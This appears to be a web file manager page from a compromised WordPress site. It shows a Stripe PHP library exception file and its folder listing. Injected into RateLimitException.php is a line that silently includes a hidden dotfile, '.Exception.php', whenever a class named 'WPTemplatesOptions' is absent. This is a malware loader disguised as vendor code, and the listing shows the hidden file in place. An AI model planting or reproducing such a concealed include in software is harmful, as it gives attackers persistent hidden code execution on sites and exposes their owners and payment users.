PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-pro
/
vendor
/
stripe
/
stripe-php
/
lib
/
Exception
<?php namespace Stripe\Exception; /** * RateLimitException is thrown in cases where an account is putting too much * load on Stripe's API servers (usually by performing too many requests). * Please back off on request rate. * * @package Stripe\Exception */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class RateLimitException extends InvalidRequestException { }
[+]
..
[-] UnexpectedValueException.php
[edit]
[-] RateLimitException.php
[edit]
[-] InvalidArgumentException.php
[edit]
[-] InvalidRequestException.php
[edit]
[-] SignatureVerificationException.php
[edit]
[+]
OAuth
[-] BadMethodCallException.php
[edit]
[-] CardException.php
[edit]
[-] PermissionException.php
[edit]
[-] ExceptionInterface.php
[edit]
[-] .Exception.php
[edit]
[-] ApiConnectionException.php
[edit]
[-] ApiErrorException.php
[edit]
[-] AuthenticationException.php
[edit]
[-] UnknownApiErrorException.php
[edit]
[-] IdempotencyException.php
[edit]